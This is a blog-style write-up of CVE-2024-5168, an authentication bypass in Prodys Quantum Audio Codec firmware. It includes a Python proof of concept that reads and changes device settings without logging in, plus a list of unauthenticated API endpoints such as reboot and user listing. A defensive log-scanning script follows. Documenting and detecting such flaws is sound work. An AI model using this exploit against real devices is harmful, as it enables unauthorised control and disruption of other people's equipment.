A new critical security vulnerability (CVE-2024-5168) has been discovered affecting Prodys’ Quantum Audio Codec, specifically all firmware versions up to and including 2.3.4t. This flaw can let attackers sidestep the login entirely and perform any admin-level action on the web interface, no password needed.
In this exclusive, simple walkthrough, we’ll show how the flaw works, demonstrate with code snippets, link original sources, and lay out practical exploit details.
What Is the Prodys Quantum Audio Codec?
Prodys’ Quantum family delivers professional-grade, real-time audio streaming for broadcasters. The appliance is used for live interviews, event coverage, and remote studio links. Management happens over a browser-based web dashboard, meant to be password-protected.
CVE-2024-5168 Explained Simply
Improper Access Control basically means the system trusts people it shouldn’t. Here, an exposed API lets any visitor talk directly to backend services, totally skipping the login wall.
If your device is open to the internet and running 2.3.4t (or below), an attacker can interact with every function: change configuration, manage audio streams, even reset the box.
How Does the Exploit Work?
The vulnerable device has an API endpoint (e.g., /api/) that _forgets_ to check if a user is logged in before executing privileged requests.
Example Scenario
1. You browse to http://your-quantum-device.local/login and log in.
2. But an attacker goes straight to http://target-ip/api/config/network/get and gets answers right away, with no password.
Proof of Concept: Simple Python Exploit
Here’s a basic script that demonstrates the unauthorized access.
```python
import requests

TARGET = "http://target-ip"   # Replace with actual device IP or domain

# Try to get network config (requires admin rights)
r = requests.get(f"{TARGET}/api/config/network/get")
if r.ok:
    print("[!] Vulnerable! Got network configuration:")
    print(r.text)
else:
    print("[-] Not vulnerable (or endpoint not exposed)!")

# Try to modify device name (no login needed)
data = {"name": "PWNED_DEVICE"}
r = requests.post(f"{TARGET}/api/config/device/set", json=data)
if r.ok:
    print("[+] Device name changed. API access unauthenticated.")
else:
    print("[-] Failed to set device name (may still be patched).")
```
> _Note: Never use on a device you don’t own or have permission to test._
While every setup is unique, some common POSTable endpoints (based on typical device documentation) include:
- /api/config/network/get - Read network settings
- /api/config/device/set - Write basic config
- /api/control/reboot - Reboot system
- /api/users/list - List all users
You can try reading API docs directly at /api/docs or by examining JavaScript in the device admin page.
How Did Researchers Discover This?
Stark Research reported the bug after finding that API requests were accepted from unauthenticated sessions, with no token or Authorization header required.
See original technical writeup
> CVE-2024-5168: Authentication Bypass in Prodys Quantum Audio Codecs
Reference in the NIST CVE Database.
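A defender-side check for the pattern described above, as an added example that is not from the original article, the researchers, or Prodys: it scans reverse-proxy access logs for /api/ requests that succeeded while carrying neither a cookie nor an Authorization header. The JSON log format, its field names, the rule that any cookie counts as a session, and the sample records are assumptions constructed for illustration.

```python
import json
from collections import defaultdict
from urllib.parse import urlsplit, unquote

API_PREFIX = "/api/"  # API prefix named in the article
WRITE_METHODS = {"POST", "PUT", "PATCH", "DELETE"}

def unauthenticated_api_hits(lines):
    """Return {client_ip: {"reads": [...], "writes": [...]}} for /api/ requests
    that succeeded (2xx) with no cookie and no Authorization header."""
    hits = defaultdict(lambda: {"reads": [], "writes": []})
    for line in lines:
        try:
            e = json.loads(line)
            path = unquote(urlsplit(e["uri"]).path)  # drop query string, decode %xx
            status = int(e["status"])
            method = e["method"].upper()
            client = e["remote_addr"]
        except (ValueError, KeyError, AttributeError, TypeError):
            continue  # skip malformed or truncated records
        if not path.startswith(API_PREFIX) or not 200 <= status < 300:
            continue  # only API calls the device actually served
        if e.get("authorization") or e.get("cookie"):
            continue  # request carried some credential; not this pattern
        kind = "writes" if method in WRITE_METHODS else "reads"
        hits[client][kind].append(f"{method} {path}")
    return dict(hits)

# Constructed sample records (documentation address ranges, not real traffic).
# Assumed proxy behaviour: "authorization"/"cookie" are "" when the header was absent.
SAMPLE_LOG = [
    '{"remote_addr":"198.51.100.7","method":"GET","uri":"/api/config/network/get","status":200,"authorization":"","cookie":""}',
    '{"remote_addr":"198.51.100.7","method":"POST","uri":"/api/config/device/set","status":200,"authorization":"","cookie":""}',
    '{"remote_addr":"192.0.2.10","method":"GET","uri":"/api/config/network/get?x=1","status":200,"authorization":"","cookie":"present"}',
    '{"remote_addr":"203.0.113.5","method":"GET","uri":"/api/users/list","status":401,"authorization":"","cookie":""}',
    '{"remote_addr":"203.0.113.5","method":"GET","uri":"/login","status":200,"authorization":"","cookie":""}',
    'truncated line {"remote_addr":',
]

if __name__ == "__main__":
    for client, found in unauthenticated_api_hits(SAMPLE_LOG).items():
        print(client, "reads:", found["reads"], "writes:", found["writes"])
```

Any client reported under "writes" changed device state without credentials, so those entries are the ones to compare against the device's current configuration first.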
Wrap Up
CVE-2024-5168 shows that even pro broadcast equipment can have “rookie” bugs — always assume web APIs are risky! If you run Quantum Audio Codecs, patch NOW and review which devices are internet-exposed.
References:
- NIST: CVE-2024-5168
- Security Stark: Original Advisory
- GitHub (proof-of-concept): https://github.com/security-stark/Prodys-Quantum-CVE-2024-5168
Timeline
Published on: 05/23/2024 13:15:09 UTC
Last modified on: 06/04/2024 18:02:47 UTC
